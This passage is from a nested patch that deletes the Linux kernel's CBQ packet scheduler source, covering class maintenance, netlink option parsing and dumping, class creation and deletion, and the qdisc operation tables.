+-		 * 2. The toplevel cutoff inhibited borrowing.
+-		 * 3. The root class is overlimit.
+-		 *
+-		 * Reset the 2nd and 3rd conditions and retry.
+-		 *
+-		 * Note that NS and cbq-2.0 are buggy here: peeking
+-		 * an arbitrary class is appropriate for ancestor-only
+-		 * sharing, but not for the toplevel algorithm.
+-		 *
+-		 * Our version is better but slower, because it requires
+-		 * two passes; that is unavoidable with top-level sharing.
+-		 */
+-
+-		if (q->toplevel == TC_CBQ_MAXLEVEL &&
+-		    q->link.undertime == PSCHED_PASTPERFECT)
+-			break;
+-
+-		q->toplevel = TC_CBQ_MAXLEVEL;
+-		q->link.undertime = PSCHED_PASTPERFECT;
+-	}
+-
+-	/* No packets in the scheduler, or nobody wants to give them to us :-(
+-	 * Sigh... start the watchdog timer in the latter case.
+-	 */
+-
+-	if (sch->q.qlen) {
+-		qdisc_qstats_overlimit(sch);
+-		if (q->wd_expires)
+-			qdisc_watchdog_schedule(&q->watchdog,
+-						now + q->wd_expires);
+-	}
+-	return NULL;
+-}
+-
+-/* CBQ class maintenance routines */
+-
+-static void cbq_adjust_levels(struct cbq_class *this)
+-{
+-	if (this == NULL)
+-		return;
+-
+-	do {
+-		int level = 0;
+-		struct cbq_class *cl;
+-
+-		cl = this->children;
+-		if (cl) {
+-			do {
+-				if (cl->level > level)
+-					level = cl->level;
+-			} while ((cl = cl->sibling) != this->children);
+-		}
+-		this->level = level + 1;
+-	} while ((this = this->tparent) != NULL);
+-}
+-
+-static void cbq_normalize_quanta(struct cbq_sched_data *q, int prio)
+-{
+-	struct cbq_class *cl;
+-	unsigned int h;
+-
+-	if (q->quanta[prio] == 0)
+-		return;
+-
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			/* BUG... Beware! This expression suffers from
+-			 * arithmetic overflow!
+-			 */
+-			if (cl->priority == prio) {
+-				cl->quantum = (cl->weight*cl->allot*q->nclasses[prio])/
+-					q->quanta[prio];
+-			}
+-			if (cl->quantum <= 0 ||
+-			    cl->quantum > 32*qdisc_dev(cl->qdisc)->mtu) {
+-				pr_warn("CBQ: class %08x has bad quantum==%ld, repaired.\n",
+-					cl->common.classid, cl->quantum);
+-				cl->quantum = qdisc_dev(cl->qdisc)->mtu/2 + 1;
+-			}
+-		}
+-	}
+-}
+-
+-static void cbq_sync_defmap(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	struct cbq_class *split = cl->split;
+-	unsigned int h;
+-	int i;
+-
+-	if (split == NULL)
+-		return;
+-
+-	for (i = 0; i <= TC_PRIO_MAX; i++) {
+-		if (split->defaults[i] == cl && !(cl->defmap & (1<<i)))
+-			split->defaults[i] = NULL;
+-	}
+-
+-	for (i = 0; i <= TC_PRIO_MAX; i++) {
+-		int level = split->level;
+-
+-		if (split->defaults[i])
+-			continue;
+-
+-		for (h = 0; h < q->clhash.hashsize; h++) {
+-			struct cbq_class *c;
+-
+-			hlist_for_each_entry(c, &q->clhash.hash[h],
+-					     common.hnode) {
+-				if (c->split == split && c->level < level &&
+-				    c->defmap & (1<<i)) {
+-					split->defaults[i] = c;
+-					level = c->level;
+-				}
+-			}
+-		}
+-	}
+-}
+-
+-static void cbq_change_defmap(struct cbq_class *cl, u32 splitid, u32 def, u32 mask)
+-{
+-	struct cbq_class *split = NULL;
+-
+-	if (splitid == 0) {
+-		split = cl->split;
+-		if (!split)
+-			return;
+-		splitid = split->common.classid;
+-	}
+-
+-	if (split == NULL || split->common.classid != splitid) {
+-		for (split = cl->tparent; split; split = split->tparent)
+-			if (split->common.classid == splitid)
+-				break;
+-	}
+-
+-	if (split == NULL)
+-		return;
+-
+-	if (cl->split != split) {
+-		cl->defmap = 0;
+-		cbq_sync_defmap(cl);
+-		cl->split = split;
+-		cl->defmap = def & mask;
+-	} else
+-		cl->defmap = (cl->defmap & ~mask) | (def & mask);
+-
+-	cbq_sync_defmap(cl);
+-}
+-
+-static void cbq_unlink_class(struct cbq_class *this)
+-{
+-	struct cbq_class *cl, **clp;
+-	struct cbq_sched_data *q = qdisc_priv(this->qdisc);
+-
+-	qdisc_class_hash_remove(&q->clhash, &this->common);
+-
+-	if (this->tparent) {
+-		clp = &this->sibling;
+-		cl = *clp;
+-		do {
+-			if (cl == this) {
+-				*clp = cl->sibling;
+-				break;
+-			}
+-			clp = &cl->sibling;
+-		} while ((cl = *clp) != this->sibling);
+-
+-		if (this->tparent->children == this) {
+-			this->tparent->children = this->sibling;
+-			if (this->sibling == this)
+-				this->tparent->children = NULL;
+-		}
+-	} else {
+-		WARN_ON(this->sibling != this);
+-	}
+-}
+-
+-static void cbq_link_class(struct cbq_class *this)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(this->qdisc);
+-	struct cbq_class *parent = this->tparent;
+-
+-	this->sibling = this;
+-	qdisc_class_hash_insert(&q->clhash, &this->common);
+-
+-	if (parent == NULL)
+-		return;
+-
+-	if (parent->children == NULL) {
+-		parent->children = this;
+-	} else {
+-		this->sibling = parent->children->sibling;
+-		parent->children->sibling = this;
+-	}
+-}
+-
+-static void
+-cbq_reset(struct Qdisc *sch)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl;
+-	int prio;
+-	unsigned int h;
+-
+-	q->activemask = 0;
+-	q->pmask = 0;
+-	q->tx_class = NULL;
+-	q->tx_borrowed = NULL;
+-	qdisc_watchdog_cancel(&q->watchdog);
+-	q->toplevel = TC_CBQ_MAXLEVEL;
+-	q->now = psched_get_time();
+-
+-	for (prio = 0; prio <= TC_CBQ_MAXPRIO; prio++)
+-		q->active[prio] = NULL;
+-
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			qdisc_reset(cl->q);
+-
+-			cl->next_alive = NULL;
+-			cl->undertime = PSCHED_PASTPERFECT;
+-			cl->avgidle = cl->maxidle;
+-			cl->deficit = cl->quantum;
+-			cl->cpriority = cl->priority;
+-		}
+-	}
+-}
+-
+-static void cbq_set_lss(struct cbq_class *cl, struct tc_cbq_lssopt *lss)
+-{
+-	if (lss->change & TCF_CBQ_LSS_FLAGS) {
+-		cl->share = (lss->flags & TCF_CBQ_LSS_ISOLATED) ? NULL : cl->tparent;
+-		cl->borrow = (lss->flags & TCF_CBQ_LSS_BOUNDED) ? NULL : cl->tparent;
+-	}
+-	if (lss->change & TCF_CBQ_LSS_EWMA)
+-		cl->ewma_log = lss->ewma_log;
+-	if (lss->change & TCF_CBQ_LSS_AVPKT)
+-		cl->avpkt = lss->avpkt;
+-	if (lss->change & TCF_CBQ_LSS_MINIDLE)
+-		cl->minidle = -(long)lss->minidle;
+-	if (lss->change & TCF_CBQ_LSS_MAXIDLE) {
+-		cl->maxidle = lss->maxidle;
+-		cl->avgidle = lss->maxidle;
+-	}
+-	if (lss->change & TCF_CBQ_LSS_OFFTIME)
+-		cl->offtime = lss->offtime;
+-}
+-
+-static void cbq_rmprio(struct cbq_sched_data *q, struct cbq_class *cl)
+-{
+-	q->nclasses[cl->priority]--;
+-	q->quanta[cl->priority] -= cl->weight;
+-	cbq_normalize_quanta(q, cl->priority);
+-}
+-
+-static void cbq_addprio(struct cbq_sched_data *q, struct cbq_class *cl)
+-{
+-	q->nclasses[cl->priority]++;
+-	q->quanta[cl->priority] += cl->weight;
+-	cbq_normalize_quanta(q, cl->priority);
+-}
+-
+-static int cbq_set_wrr(struct cbq_class *cl, struct tc_cbq_wrropt *wrr)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-
+-	if (wrr->allot)
+-		cl->allot = wrr->allot;
+-	if (wrr->weight)
+-		cl->weight = wrr->weight;
+-	if (wrr->priority) {
+-		cl->priority = wrr->priority - 1;
+-		cl->cpriority = cl->priority;
+-		if (cl->priority >= cl->priority2)
+-			cl->priority2 = TC_CBQ_MAXPRIO - 1;
+-	}
+-
+-	cbq_addprio(q, cl);
+-	return 0;
+-}
+-
+-static int cbq_set_fopt(struct cbq_class *cl, struct tc_cbq_fopt *fopt)
+-{
+-	cbq_change_defmap(cl, fopt->split, fopt->defmap, fopt->defchange);
+-	return 0;
+-}
+-
+-static const struct nla_policy cbq_policy[TCA_CBQ_MAX + 1] = {
+-	[TCA_CBQ_LSSOPT]	= { .len = sizeof(struct tc_cbq_lssopt) },
+-	[TCA_CBQ_WRROPT]	= { .len = sizeof(struct tc_cbq_wrropt) },
+-	[TCA_CBQ_FOPT]		= { .len = sizeof(struct tc_cbq_fopt) },
+-	[TCA_CBQ_OVL_STRATEGY]	= { .len = sizeof(struct tc_cbq_ovl) },
+-	[TCA_CBQ_RATE]		= { .len = sizeof(struct tc_ratespec) },
+-	[TCA_CBQ_RTAB]		= { .type = NLA_BINARY, .len = TC_RTAB_SIZE },
+-	[TCA_CBQ_POLICE]	= { .len = sizeof(struct tc_cbq_police) },
+-};
+-
+-static int cbq_opt_parse(struct nlattr *tb[TCA_CBQ_MAX + 1],
+-			 struct nlattr *opt,
+-			 struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (!opt) {
+-		NL_SET_ERR_MSG(extack, "CBQ options are required for this operation");
+-		return -EINVAL;
+-	}
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_CBQ_MAX, opt,
+-					  cbq_policy, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (tb[TCA_CBQ_WRROPT]) {
+-		const struct tc_cbq_wrropt *wrr = nla_data(tb[TCA_CBQ_WRROPT]);
+-
+-		if (wrr->priority > TC_CBQ_MAXPRIO) {
+-			NL_SET_ERR_MSG(extack, "priority is bigger than TC_CBQ_MAXPRIO");
+-			err = -EINVAL;
+-		}
+-	}
+-	return err;
+-}
+-
+-static int cbq_init(struct Qdisc *sch, struct nlattr *opt,
+-		    struct netlink_ext_ack *extack)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct nlattr *tb[TCA_CBQ_MAX + 1];
+-	struct tc_ratespec *r;
+-	int err;
+-
+-	qdisc_watchdog_init(&q->watchdog, sch);
+-
+-	err = cbq_opt_parse(tb, opt, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (!tb[TCA_CBQ_RTAB] || !tb[TCA_CBQ_RATE]) {
+-		NL_SET_ERR_MSG(extack, "Rate specification missing or incomplete");
+-		return -EINVAL;
+-	}
+-
+-	r = nla_data(tb[TCA_CBQ_RATE]);
+-
+-	q->link.R_tab = qdisc_get_rtab(r, tb[TCA_CBQ_RTAB], extack);
+-	if (!q->link.R_tab)
+-		return -EINVAL;
+-
+-	err = tcf_block_get(&q->link.block, &q->link.filter_list, sch, extack);
+-	if (err)
+-		goto put_rtab;
+-
+-	err = qdisc_class_hash_init(&q->clhash);
+-	if (err < 0)
+-		goto put_block;
+-
+-	q->link.sibling = &q->link;
+-	q->link.common.classid = sch->handle;
+-	q->link.qdisc = sch;
+-	q->link.q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops,
+-				      sch->handle, NULL);
+-	if (!q->link.q)
+-		q->link.q = &noop_qdisc;
+-	else
+-		qdisc_hash_add(q->link.q, true);
+-
+-	q->link.priority = TC_CBQ_MAXPRIO - 1;
+-	q->link.priority2 = TC_CBQ_MAXPRIO - 1;
+-	q->link.cpriority = TC_CBQ_MAXPRIO - 1;
+-	q->link.allot = psched_mtu(qdisc_dev(sch));
+-	q->link.quantum = q->link.allot;
+-	q->link.weight = q->link.R_tab->rate.rate;
+-
+-	q->link.ewma_log = TC_CBQ_DEF_EWMA;
+-	q->link.avpkt = q->link.allot/2;
+-	q->link.minidle = -0x7FFFFFFF;
+-
+-	q->toplevel = TC_CBQ_MAXLEVEL;
+-	q->now = psched_get_time();
+-
+-	cbq_link_class(&q->link);
+-
+-	if (tb[TCA_CBQ_LSSOPT])
+-		cbq_set_lss(&q->link, nla_data(tb[TCA_CBQ_LSSOPT]));
+-
+-	cbq_addprio(q, &q->link);
+-	return 0;
+-
+-put_block:
+-	tcf_block_put(q->link.block);
+-
+-put_rtab:
+-	qdisc_put_rtab(q->link.R_tab);
+-	return err;
+-}
+-
+-static int cbq_dump_rate(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-
+-	if (nla_put(skb, TCA_CBQ_RATE, sizeof(cl->R_tab->rate), &cl->R_tab->rate))
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_lss(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-	struct tc_cbq_lssopt opt;
+-
+-	opt.flags = 0;
+-	if (cl->borrow == NULL)
+-		opt.flags |= TCF_CBQ_LSS_BOUNDED;
+-	if (cl->share == NULL)
+-		opt.flags |= TCF_CBQ_LSS_ISOLATED;
+-	opt.ewma_log = cl->ewma_log;
+-	opt.level = cl->level;
+-	opt.avpkt = cl->avpkt;
+-	opt.maxidle = cl->maxidle;
+-	opt.minidle = (u32)(-cl->minidle);
+-	opt.offtime = cl->offtime;
+-	opt.change = ~0;
+-	if (nla_put(skb, TCA_CBQ_LSSOPT, sizeof(opt), &opt))
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_wrr(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-	struct tc_cbq_wrropt opt;
+-
+-	memset(&opt, 0, sizeof(opt));
+-	opt.flags = 0;
+-	opt.allot = cl->allot;
+-	opt.priority = cl->priority + 1;
+-	opt.cpriority = cl->cpriority + 1;
+-	opt.weight = cl->weight;
+-	if (nla_put(skb, TCA_CBQ_WRROPT, sizeof(opt), &opt))
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_fopt(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-	struct tc_cbq_fopt opt;
+-
+-	if (cl->split || cl->defmap) {
+-		opt.split = cl->split ? cl->split->common.classid : 0;
+-		opt.defmap = cl->defmap;
+-		opt.defchange = ~0;
+-		if (nla_put(skb, TCA_CBQ_FOPT, sizeof(opt), &opt))
+-			goto nla_put_failure;
+-	}
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_attr(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	if (cbq_dump_lss(skb, cl) < 0 ||
+-	    cbq_dump_rate(skb, cl) < 0 ||
+-	    cbq_dump_wrr(skb, cl) < 0 ||
+-	    cbq_dump_fopt(skb, cl) < 0)
+-		return -1;
+-	return 0;
+-}
+-
+-static int cbq_dump(struct Qdisc *sch, struct sk_buff *skb)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct nlattr *nest;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-	if (cbq_dump_attr(skb, &q->link) < 0)
+-		goto nla_put_failure;
+-	return nla_nest_end(skb, nest);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static int
+-cbq_dump_stats(struct Qdisc *sch, struct gnet_dump *d)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-
+-	q->link.xstats.avgidle = q->link.avgidle;
+-	return gnet_stats_copy_app(d, &q->link.xstats, sizeof(q->link.xstats));
+-}
+-
+-static int
+-cbq_dump_class(struct Qdisc *sch, unsigned long arg,
+-	       struct sk_buff *skb, struct tcmsg *tcm)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-	struct nlattr *nest;
+-
+-	if (cl->tparent)
+-		tcm->tcm_parent = cl->tparent->common.classid;
+-	else
+-		tcm->tcm_parent = TC_H_ROOT;
+-	tcm->tcm_handle = cl->common.classid;
+-	tcm->tcm_info = cl->q->handle;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-	if (cbq_dump_attr(skb, cl) < 0)
+-		goto nla_put_failure;
+-	return nla_nest_end(skb, nest);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static int
+-cbq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
+-	struct gnet_dump *d)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-	__u32 qlen;
+-
+-	cl->xstats.avgidle = cl->avgidle;
+-	cl->xstats.undertime = 0;
+-	qdisc_qstats_qlen_backlog(cl->q, &qlen, &cl->qstats.backlog);
+-
+-	if (cl->undertime != PSCHED_PASTPERFECT)
+-		cl->xstats.undertime = cl->undertime - q->now;
+-
+-	if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
+-	    gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
+-	    gnet_stats_copy_queue(d, NULL, &cl->qstats, qlen) < 0)
+-		return -1;
+-
+-	return gnet_stats_copy_app(d, &cl->xstats, sizeof(cl->xstats));
+-}
+-
+-static int cbq_graft(struct Qdisc *sch, unsigned long arg, struct Qdisc *new,
+-		     struct Qdisc **old, struct netlink_ext_ack *extack)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	if (new == NULL) {
+-		new = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops,
+-					cl->common.classid, extack);
+-		if (new == NULL)
+-			return -ENOBUFS;
+-	}
+-
+-	*old = qdisc_replace(sch, new, &cl->q);
+-	return 0;
+-}
+-
+-static struct Qdisc *cbq_leaf(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	return cl->q;
+-}
+-
+-static void cbq_qlen_notify(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	cbq_deactivate_class(cl);
+-}
+-
+-static unsigned long cbq_find(struct Qdisc *sch, u32 classid)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-
+-	return (unsigned long)cbq_class_lookup(q, classid);
+-}
+-
+-static void cbq_destroy_class(struct Qdisc *sch, struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-
+-	WARN_ON(cl->filters);
+-
+-	tcf_block_put(cl->block);
+-	qdisc_put(cl->q);
+-	qdisc_put_rtab(cl->R_tab);
+-	gen_kill_estimator(&cl->rate_est);
+-	if (cl != &q->link)
+-		kfree(cl);
+-}
+-
+-static void cbq_destroy(struct Qdisc *sch)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct hlist_node *next;
+-	struct cbq_class *cl;
+-	unsigned int h;
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-	q->rx_class = NULL;
+-#endif
+-	/*
+-	 * Filters must be destroyed first because we don't destroy the
+-	 * classes from root to leaves, which means that filters can still
+-	 * be bound to classes which have been destroyed already. --TGR '04
+-	 */
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			tcf_block_put(cl->block);
+-			cl->block = NULL;
+-		}
+-	}
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry_safe(cl, next, &q->clhash.hash[h],
+-					  common.hnode)
+-			cbq_destroy_class(sch, cl);
+-	}
+-	qdisc_class_hash_destroy(&q->clhash);
+-}
+-
+-static int
+-cbq_change_class(struct Qdisc *sch, u32 classid, u32 parentid, struct nlattr **tca,
+-		 unsigned long *arg, struct netlink_ext_ack *extack)
+-{
+-	int err;
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)*arg;
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_CBQ_MAX + 1];
+-	struct cbq_class *parent;
+-	struct qdisc_rate_table *rtab = NULL;
+-
+-	err = cbq_opt_parse(tb, opt, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (tb[TCA_CBQ_OVL_STRATEGY] || tb[TCA_CBQ_POLICE]) {
+-		NL_SET_ERR_MSG(extack, "Neither overlimit strategy nor policing attributes can be used for changing class params");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	if (cl) {
+-		/* Check parent */
+-		if (parentid) {
+-			if (cl->tparent &&
+-			    cl->tparent->common.classid != parentid) {
+-				NL_SET_ERR_MSG(extack, "Invalid parent id");
+-				return -EINVAL;
+-			}
+-			if (!cl->tparent && parentid != TC_H_ROOT) {
+-				NL_SET_ERR_MSG(extack, "Parent must be root");
+-				return -EINVAL;
+-			}
+-		}
+-
+-		if (tb[TCA_CBQ_RATE]) {
+-			rtab = qdisc_get_rtab(nla_data(tb[TCA_CBQ_RATE]),
+-					      tb[TCA_CBQ_RTAB], extack);
+-			if (rtab == NULL)
+-				return -EINVAL;
+-		}
+-
+-		if (tca[TCA_RATE]) {
+-			err = gen_replace_estimator(&cl->bstats, NULL,
+-						    &cl->rate_est,
+-						    NULL,
+-						    true,
+-						    tca[TCA_RATE]);
+-			if (err) {
+-				NL_SET_ERR_MSG(extack, "Failed to replace specified rate estimator");
+-				qdisc_put_rtab(rtab);
+-				return err;
+-			}
+-		}
+-
+-		/* Change class parameters */
+-		sch_tree_lock(sch);
+-
+-		if (cl->next_alive != NULL)
+-			cbq_deactivate_class(cl);
+-
+-		if (rtab) {
+-			qdisc_put_rtab(cl->R_tab);
+-			cl->R_tab = rtab;
+-		}
+-
+-		if (tb[TCA_CBQ_LSSOPT])
+-			cbq_set_lss(cl, nla_data(tb[TCA_CBQ_LSSOPT]));
+-
+-		if (tb[TCA_CBQ_WRROPT]) {
+-			cbq_rmprio(q, cl);
+-			cbq_set_wrr(cl, nla_data(tb[TCA_CBQ_WRROPT]));
+-		}
+-
+-		if (tb[TCA_CBQ_FOPT])
+-			cbq_set_fopt(cl, nla_data(tb[TCA_CBQ_FOPT]));
+-
+-		if (cl->q->q.qlen)
+-			cbq_activate_class(cl);
+-
+-		sch_tree_unlock(sch);
+-
+-		return 0;
+-	}
+-
+-	if (parentid == TC_H_ROOT)
+-		return -EINVAL;
+-
+-	if (!tb[TCA_CBQ_WRROPT] || !tb[TCA_CBQ_RATE] || !tb[TCA_CBQ_LSSOPT]) {
+-		NL_SET_ERR_MSG(extack, "The following attributes MUST all be specified: WRR, rate and link sharing");
+-		return -EINVAL;
+-	}
+-
+-	rtab = qdisc_get_rtab(nla_data(tb[TCA_CBQ_RATE]), tb[TCA_CBQ_RTAB],
+-			      extack);
+-	if (rtab == NULL)
+-		return -EINVAL;
+-
+-	if (classid) {
+-		err = -EINVAL;
+-		if (TC_H_MAJ(classid ^ sch->handle) ||
+-		    cbq_class_lookup(q, classid)) {
+-			NL_SET_ERR_MSG(extack, "Specified class not found");
+-			goto failure;
+-		}
+-	} else {
+-		int i;
+-		classid = TC_H_MAKE(sch->handle, 0x8000);
+-
+-		for (i = 0; i < 0x8000; i++) {
+-			if (++q->hgenerator >= 0x8000)
+-				q->hgenerator = 1;
+-			if (cbq_class_lookup(q, classid|q->hgenerator) == NULL)
+-				break;
+-		}
+-		err = -ENOSR;
+-		if (i >= 0x8000) {
+-			NL_SET_ERR_MSG(extack, "Unable to generate classid");
+-			goto failure;
+-		}
+-		classid = classid|q->hgenerator;
+-	}
+-
+-	parent = &q->link;
+-	if (parentid) {
+-		parent = cbq_class_lookup(q, parentid);
+-		err = -EINVAL;
+-		if (!parent) {
+-			NL_SET_ERR_MSG(extack, "Failed to find parentid");
+-			goto failure;
+-		}
+-	}
+-
+-	err = -ENOBUFS;
+-	cl = kzalloc(sizeof(*cl), GFP_KERNEL);
+-	if (cl == NULL)
+-		goto failure;
+-
+-	gnet_stats_basic_sync_init(&cl->bstats);
+-	err = tcf_block_get(&cl->block, &cl->filter_list, sch, extack);
+-	if (err) {
+-		kfree(cl);
+-		goto failure;
+-	}
+-
+-	if (tca[TCA_RATE]) {
+-		err = gen_new_estimator(&cl->bstats, NULL, &cl->rate_est,
+-					NULL, true, tca[TCA_RATE]);
+-		if (err) {
+-			NL_SET_ERR_MSG(extack, "Couldn't create new estimator");
+-			tcf_block_put(cl->block);
+-			kfree(cl);
+-			goto failure;
+-		}
+-	}
+-
+-	cl->R_tab = rtab;
+-	rtab = NULL;
+-	cl->q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops, classid,
+-				  NULL);
+-	if (!cl->q)
+-		cl->q = &noop_qdisc;
+-	else
+-		qdisc_hash_add(cl->q, true);
+-
+-	cl->common.classid = classid;
+-	cl->tparent = parent;
+-	cl->qdisc = sch;
+-	cl->allot = parent->allot;
+-	cl->quantum = cl->allot;
+-	cl->weight = cl->R_tab->rate.rate;
+-
+-	sch_tree_lock(sch);
+-	cbq_link_class(cl);
+-	cl->borrow = cl->tparent;
+-	if (cl->tparent != &q->link)
+-		cl->share = cl->tparent;
+-	cbq_adjust_levels(parent);
+-	cl->minidle = -0x7FFFFFFF;
+-	cbq_set_lss(cl, nla_data(tb[TCA_CBQ_LSSOPT]));
+-	cbq_set_wrr(cl, nla_data(tb[TCA_CBQ_WRROPT]));
+-	if (cl->ewma_log == 0)
+-		cl->ewma_log = q->link.ewma_log;
+-	if (cl->maxidle == 0)
+-		cl->maxidle = q->link.maxidle;
+-	if (cl->avpkt == 0)
+-		cl->avpkt = q->link.avpkt;
+-	if (tb[TCA_CBQ_FOPT])
+-		cbq_set_fopt(cl, nla_data(tb[TCA_CBQ_FOPT]));
+-	sch_tree_unlock(sch);
+-
+-	qdisc_class_hash_grow(sch, &q->clhash);
+-
+-	*arg = (unsigned long)cl;
+-	return 0;
+-
+-failure:
+-	qdisc_put_rtab(rtab);
+-	return err;
+-}
+-
+-static int cbq_delete(struct Qdisc *sch, unsigned long arg,
+-		      struct netlink_ext_ack *extack)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	if (cl->filters || cl->children || cl == &q->link)
+-		return -EBUSY;
+-
+-	sch_tree_lock(sch);
+-
+-	qdisc_purge_queue(cl->q);
+-
+-	if (cl->next_alive)
+-		cbq_deactivate_class(cl);
+-
+-	if (q->tx_borrowed == cl)
+-		q->tx_borrowed = q->tx_class;
+-	if (q->tx_class == cl) {
+-		q->tx_class = NULL;
+-		q->tx_borrowed = NULL;
+-	}
+-#ifdef CONFIG_NET_CLS_ACT
+-	if (q->rx_class == cl)
+-		q->rx_class = NULL;
+-#endif
+-
+-	cbq_unlink_class(cl);
+-	cbq_adjust_levels(cl->tparent);
+-	cl->defmap = 0;
+-	cbq_sync_defmap(cl);
+-
+-	cbq_rmprio(q, cl);
+-	sch_tree_unlock(sch);
+-
+-	cbq_destroy_class(sch, cl);
+-	return 0;
+-}
+-
+-static struct tcf_block *cbq_tcf_block(struct Qdisc *sch, unsigned long arg,
+-				       struct netlink_ext_ack *extack)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	if (cl == NULL)
+-		cl = &q->link;
+-
+-	return cl->block;
+-}
+-
+-static unsigned long cbq_bind_filter(struct Qdisc *sch, unsigned long parent,
+-				     u32 classid)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *p = (struct cbq_class *)parent;
+-	struct cbq_class *cl = cbq_class_lookup(q, classid);
+-
+-	if (cl) {
+-		if (p && p->level <= cl->level)
+-			return 0;
+-		cl->filters++;
+-		return (unsigned long)cl;
+-	}
+-	return 0;
+-}
+-
+-static void cbq_unbind_filter(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	cl->filters--;
+-}
+-
+-static void cbq_walk(struct Qdisc *sch, struct qdisc_walker *arg)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl;
+-	unsigned int h;
+-
+-	if (arg->stop)
+-		return;
+-
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			if (!tc_qdisc_stats_dump(sch, (unsigned long)cl, arg))
+-				return;
+-		}
+-	}
+-}
+-
+-static const struct Qdisc_class_ops cbq_class_ops = {
+-	.graft		=	cbq_graft,
+-	.leaf		=	cbq_leaf,
+-	.qlen_notify	=	cbq_qlen_notify,
+-	.find		=	cbq_find,
+-	.change		=	cbq_change_class,
+-	.delete		=	cbq_delete,
+-	.walk		=	cbq_walk,
+-	.tcf_block	=	cbq_tcf_block,
+-	.bind_tcf	=	cbq_bind_filter,
+-	.unbind_tcf	=	cbq_unbind_filter,
+-	.dump		=	cbq_dump_class,
+-	.dump_stats	=	cbq_dump_class_stats,
+-};
+-
+-static struct Qdisc_ops cbq_qdisc_ops __read_mostly = {
+-	.next		=	NULL,
+-	.cl_ops		=	&cbq_class_ops,
+-	.id		=	"cbq",
+-	.priv_size	=	sizeof(struct cbq_sched_data),
+-	.enqueue	=	cbq_enqueue,
+-	.dequeue	=	cbq_dequeue,
+-	.peek		=	qdisc_peek_dequeued,
+-	.init		=	cbq_init,
+-	.reset		=	cbq_reset,
+-	.destroy	=	cbq_destroy,
+-	.change		=	NULL,
+-	.dump		=	cbq_dump,
